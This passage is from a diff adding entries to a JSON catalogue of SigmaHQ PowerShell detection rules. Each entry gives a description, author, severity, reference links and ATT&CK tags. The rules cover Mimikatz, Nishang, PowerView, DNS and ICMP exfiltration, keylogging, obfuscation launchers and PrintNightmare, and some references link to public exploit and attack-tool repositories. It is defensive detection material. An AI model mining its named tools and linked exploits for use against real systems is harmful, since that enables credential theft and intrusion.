+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1018"
+ ]
+ },
+ "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138",
+ "value": "Active Directory Computers Enumeration with Get-AdComputer"
+ },
+ {
+ "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory",
+ "meta": {
+ "author": "frack113",
+ 
"creation_date": "2022/03/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_get_adgroup.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1069.002"
+ ]
+ },
+ "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee",
+ "value": "Active Directory Group Enumeration With Get-AdGroup"
+ },
+ {
+ "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/06",
+ "falsepositive": [
+ "Legitimate PowerShell scripts"
+ ],
+ "filename": "posh_ps_get_adreplaccount.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.powershellgallery.com/packages/DSInternals",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.006"
+ ]
+ },
+ "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73",
+ "value": "Suspicious Get-ADReplAccount"
+ },
+ {
+ "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_get_childitem_bookmarks.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1217"
+ ]
+ },
+ "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf",
+ "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell"
+ },
+ {
+ "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/21",
+ "falsepositive": [
+ "Legitimate administration scripts"
+ ],
+ "filename": "posh_ps_hotfix_enum.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml"
+ ],
+ "tags": [
+ "attack.discovery"
+ ]
+ },
+ "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c",
+ "value": "PowerShell Hotfix Enumeration"
+ },
+ {
+ "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.",
+ "meta": {
+ "author": "Bartlomiej Czyz @bczyz1, oscd.community",
+ "creation_date": "2020/10/10",
+ "falsepositive": [
+ "Legitimate usage of System.Net.NetworkInformation.Ping class"
+ ],
+ "filename": "posh_ps_icmp_exfiltration.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1048.003"
+ ]
+ },
+ "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c",
+ "value": "PowerShell ICMP Exfiltration"
+ },
+ {
+ "description": "Detects powershell scripts that import modules from suspicious directories",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_import_module_susp_dirs.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab",
+ "value": "Import PowerShell Modules From Suspicious Directories"
+ },
+ {
+ "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/07",
+ "falsepositive": [
+ "Legitimate script"
+ ],
+ "filename": "posh_ps_invoke_command_remote.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.006"
+ ]
+ },
+ "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6",
+ "value": "Execute Invoke-command on Remote Host"
+ },
+ {
+ "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/07",
+ "falsepositive": [
+ "Legitimate script"
+ ],
+ "filename": "posh_ps_invoke_dnsexfiltration.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh",
+ "https://github.com/Arno0x/DNSExfiltrator",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1048"
+ ]
+ },
+ "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355",
+ "value": "Powershell DNSExfiltration"
+ },
+ {
+ "description": "Detects Commandlet name for PrintNightmare exploitation.",
+ "meta": {
+ "author": "Max Altgelt, Tobias Michalski",
+ "creation_date": "2021/08/09",
+ "falsepositive": [
+ 
"Unknown"
+ ],
+ "filename": "posh_ps_invoke_nightmare.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1548"
+ ]
+ },
+ "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf",
+ "value": "PrintNightmare Powershell Exploitation"
+ },
+ {
+ "description": "Detects Obfuscated use of Clip.exe to execute PowerShell",
+ "meta": {
+ "author": "Jonathan Cheong, oscd.community",
+ "creation_date": "2020/10/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_invoke_obfuscation_clip.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "73e67340-0d25-11eb-adc1-0242ac120002",
+ "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell"
+ },
+ {
+ "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014",
+ "meta": {
+ "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community",
+ "creation_date": "2019/11/08",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7",
+ "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell"
+ },
+ {
+ "description": "Detects Obfuscated use of stdin to execute PowerShell",
+ "meta": {
+ "author": "Jonathan Cheong, oscd.community",
+ "creation_date": "2020/10/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_invoke_obfuscation_stdin.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002",
+ "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell"
+ },
+ {
+ "description": "Detects Obfuscated use of Environment Variables to execute PowerShell",
+ "meta": {
+ "author": "Jonathan Cheong, oscd.community",
+ "creation_date": "2020/10/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_invoke_obfuscation_var.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Neo23x0/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002",
+ "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell"
+ },
+ {
+ "description": "Detects Obfuscated Powershell via COMPRESS 
OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "value": "Invoke-Obfuscation Via Stdin - Powershell" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "value": "Invoke-Obfuscation Via Use Clip - Powershell" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via use 
Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" + }, + { + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_keylogging.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" + ], + "tags": [ + "attack.collection", + "attack.t1056.001" + ] + }, + "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "value": "Powershell Keylogging" + }, + { + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_localuser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "value": "Powershell LocalAccount Manipulation" + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_mailboxexport_share.yml", + "level": "critical", + 
"logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "value": "Suspicious PowerShell Mailbox Export to Share - PS" + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + 
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "value": "Malicious PowerShell Commandlets" + }, + { + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "value": "Malicious PowerShell Keywords" + }, + { + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/21", + "falsepositive": [ + "Diagnostics" + ], + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" + ], + "tags": [ + "attack.t1003" + ] + }, + "uuid": "cd185561-4760-45d6-a63e-a51325112cae", + "value": "Live Memory Dump Using Powershell" + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "meta": { + "author": "frack113", + 
"creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate use" + ], + "filename": "posh_ps_modify_group_policy_settings.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ] + }, + "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "value": "Modify Group Policy Settings - ScriptBlockLogging" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113, MatilJ", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_msxml_com.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"78aa1347-1517-4454-9982-b338d6df8343", + "value": "Powershell MsXml COM Object" + }, + { + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "meta": { + "author": "Alec Costello", + "creation_date": "2019/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_nishang_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/samratashok/nishang", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "value": "Malicious Nishang PowerShell Commandlets" + }, + { + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "meta": { + "author": "Sami Ruohonen", + "creation_date": "2018/07/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_ntfs_ads_access.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", + "value": "NTFS Alternate Data Stream" + }, + { + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" 
+ ], + "filename": "posh_ps_office_comobject_registerxll.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ] + }, + "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "value": "Code Executed Via Office Add-in XLL File" + }, + { + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Mimikatz can be useful for testing the security of networks" + ], + "filename": "posh_ps_potential_invoke_mimikatz.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", + "value": "Potential Invoke-Mimikatz PowerShell Script" + }, + { + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/18", + "falsepositive": [ + "Should not be any as administrators do not use this tool" + ], + "filename": "posh_ps_powerview_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
